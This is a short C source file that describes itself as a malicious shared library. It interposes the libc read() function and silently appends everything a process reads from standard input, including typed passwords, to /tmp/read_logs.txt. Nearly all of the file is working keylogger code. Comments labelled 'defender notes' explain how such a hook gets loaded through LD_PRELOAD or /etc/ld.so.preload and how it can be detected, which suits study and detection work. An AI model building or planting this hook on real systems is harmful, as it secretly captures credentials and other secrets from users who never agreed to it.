/**
* Date : 15/03/2025 03:41 AM
* Author : @TF
* Description : Malicious Shared Library Hooking `read` Function.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
/*
 * Interposed replacement for libc's read(2).
 *
 * This object exports a symbol named `read` with the libc signature. A process
 * that binds `read` to this library instead of libc runs this code on every
 * read() call. The call is forwarded to the next `read` in symbol lookup order,
 * and any data successfully read from file descriptor 0 (stdin) is also
 * appended to /tmp/read_logs.txt.
 *
 * @param fd    descriptor, passed through unchanged to the real read()
 * @param buf   caller's buffer, filled by the real read()
 * @param count maximum byte count, passed through unchanged
 * @return      the real read()'s return value, unmodified
 *
 * Defender notes:
 *  - What is exposed: everything the host process reads from stdin, which may
 *    include credentials or other secrets typed at prompts.
 *  - How it gets loaded is not shown in this file. For this definition to win
 *    over libc's, the library has to come earlier in the lookup order; the
 *    usual places to audit are the LD_PRELOAD environment variable and
 *    /etc/ld.so.preload, plus unexpected objects in /proc/<pid>/maps.
 *  - On-disk artifact: /tmp/read_logs.txt, reopened in append mode on every
 *    qualifying read. File-integrity or audit rules on that path, or on
 *    open-for-append in /tmp by interactive programs, would surface it.
 */
ssize_t read(int fd, void *buf, size_t count) {
// Cached pointer to the real implementation; resolved once, on first call.
static ssize_t (*orig_read)(int, void *, size_t) = NULL;
if (!orig_read) {
// RTLD_NEXT: find the next definition of "read" after this object in the
// lookup order (the real one, when nothing else interposes).
orig_read = dlsym(RTLD_NEXT, "read");
}
// Perform the real read first so the caller's buffer holds the data.
ssize_t output = orig_read(fd, buf, count);
// Only successful, non-empty reads from stdin (fd 0) are copied; errors (-1),
// EOF (0) and every other descriptor pass through untouched.
if (fd == 0 && output > 0) {
// "a" = append, creating the file if absent. Its permissions come from the
// host process's umask, so the captured data may be readable by other
// local users.
FILE *logfile = fopen("/tmp/read_logs.txt", "a");
// A failed open is silently skipped: the host program sees no error.
if (logfile) {
// Raw copy of exactly the bytes returned (buf is not NUL-terminated).
fwrite(buf, 1, output, logfile);
// Newline separates one captured read from the next in the log.
fputc('\n', logfile);
fclose(logfile);
}
}
// The caller receives the genuine result, so the hook is invisible at the
// API level.
return output;
}